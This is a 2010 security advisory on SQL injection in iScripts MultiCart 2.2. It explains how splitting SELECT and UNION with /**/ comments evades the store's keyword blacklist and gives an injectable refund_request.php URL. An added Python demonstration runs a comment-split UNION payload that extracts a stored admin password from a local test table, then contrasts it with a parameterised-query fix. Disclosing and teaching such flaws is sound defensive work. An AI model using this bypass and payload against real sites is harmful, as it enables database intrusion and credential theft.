iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability

Name              iScripts MultiCart
Vendor            http://www.iscripts.com
Versions Affected 2.2
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-03-07

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION

iScripts MultiCart 2.2 is an online shopping cart solution that lets a single
storefront host multiple vendors selling physical or digital (downloadable)
products.

II. DESCRIPTION

The mechanism adopted to prevent SQL injection is a keyword blacklist applied
to the raw query string. The blacklist is trivially bypassed, so the many SQL
injection flaws it was meant to cover remain exploitable.

III. ANALYSIS

Summary:

A) Multiple SQL Injection

A) Multiple SQL Injection

The protection consists of converting the query string to uppercase and
checking whether it contains the words UNION or SELECT. MySQL strips C-style
comments before it tokenises a statement, so a keyword split by empty comments
is still parsed as that keyword, while a plain substring search no longer
matches it:

    SELECT becomes SE/**/LE/**/CT
    UNION  becomes UN/**/ION

The new strings do not match the words in the blacklist, but MySQL executes
them as SELECT and UNION. The following is the affected code (session.php):

    // Only the raw GET query string is inspected: POST bodies and cookies are
    // never checked, and strpos() cannot see through /**/ inserted in a keyword.
    $mystring = strtoupper($_SERVER['QUERY_STRING']);
    $server_injec1=strpos($mystring, 'SELECT');
    $server_injec2=strpos($mystring, 'UNION');
    // strpos() returns int 0 for a match at offset 0, which is never === '0'
    // (a string), so the second half of the condition is dead code.
    if (($server_injec1 === false) && ($server_injec2 === false) || ($server_injec1 === '0') && ($server_injec2 === '0')) { ; }//end if
    else { header('location:index.php'); exit(); }

Note also that $_SERVER['QUERY_STRING'] is the undecoded request string, while
the values the scripts actually use come from $_GET after URL decoding; a
blacklist applied before decoding is one more reason this kind of filter cannot
be made reliable.

IV. SAMPLE CODE

A) Multiple SQL Injection

    http://site/path/refund_request.php?orderid=SQL

V. FIX

No fix was available from the vendor at the time of writing. Keyword
blacklists are not a substitute for parameterised queries: the affected
scripts should bind user input with prepared statements (or, for numeric
parameters such as orderid, cast the value to an integer before use).
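The following is an added example, not code from the advisory or from
iScripts: it ports the session.php blacklist to Python, shows that the
comment-split payload passes the filter, reproduces what MySQL does with the
/**/ comments, and contrasts the concatenated query with a parameterised one.
The refunds/users tables, column names and the shape of the refund query are
assumptions made for the demonstration (the advisory only states that orderid
in refund_request.php is injectable), and the comment stripping stands in for
MySQL's lexer because SQLite does not join SE/**/LE/**/CT back into SELECT.

```python
import re
import sqlite3


def multicart_filter_allows(query_string: str) -> bool:
    """Port of the session.php check: uppercase the raw query string and
    reject it if the substrings SELECT or UNION appear anywhere."""
    s = query_string.upper()
    return "SELECT" not in s and "UNION" not in s


def strip_inline_comments(sql: str) -> str:
    """Drop ordinary /* ... */ comments the way MySQL's lexer does before
    tokenising, so SE/**/LE/**/CT collapses back to SELECT. Versioned
    /*! ... */ comments are executed by MySQL and are left alone here."""
    return re.sub(r"/\*(?!!).*?\*/", "", sql, flags=re.S)


def build_vulnerable_query(orderid: str) -> str:
    """Hypothetical reconstruction of the refund lookup: orderid is
    concatenated straight into the statement (table/columns are assumed)."""
    return "SELECT orderid, amount FROM refunds WHERE orderid = " + orderid


def _demo_db() -> sqlite3.Connection:
    # Constructed sample data: one refund and one user row to steal.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE refunds(orderid INTEGER, amount INTEGER);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO refunds VALUES (1, 50);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
        """
    )
    return db


def run_vulnerable(orderid: str) -> list:
    """Execute the concatenated query after the MySQL-style comment removal;
    a UNION payload returns the users row alongside the refund."""
    db = _demo_db()
    sql = strip_inline_comments(build_vulnerable_query(orderid))
    return db.execute(sql).fetchall()


def run_parameterized(orderid: str) -> list:
    """The fix: bind orderid as a parameter, so whatever the client sends is
    compared as a value and can never become part of the statement."""
    db = _demo_db()
    return db.execute(
        "SELECT orderid, amount FROM refunds WHERE orderid = ?", (orderid,)
    ).fetchall()


NAIVE_PAYLOAD = "1 UNION SELECT login, password FROM users"
EVASIVE_PAYLOAD = "1 UN/**/ION SE/**/LE/**/CT login, password FROM users"


if __name__ == "__main__":
    print(multicart_filter_allows("orderid=" + NAIVE_PAYLOAD))    # False: blocked
    print(multicart_filter_allows("orderid=" + EVASIVE_PAYLOAD))  # True: passes
    print(run_vulnerable(EVASIVE_PAYLOAD))     # refund row plus admin credentials
    print(run_parameterized(EVASIVE_PAYLOAD))  # []: the payload is just a non-matching value
```

The filter port is deliberately literal so the bypass can be checked against
the same logic the advisory quotes; the parameterised variant is what the FIX
section recommends, and it returns nothing for the payload because the whole
string is bound as a single value rather than parsed as SQL.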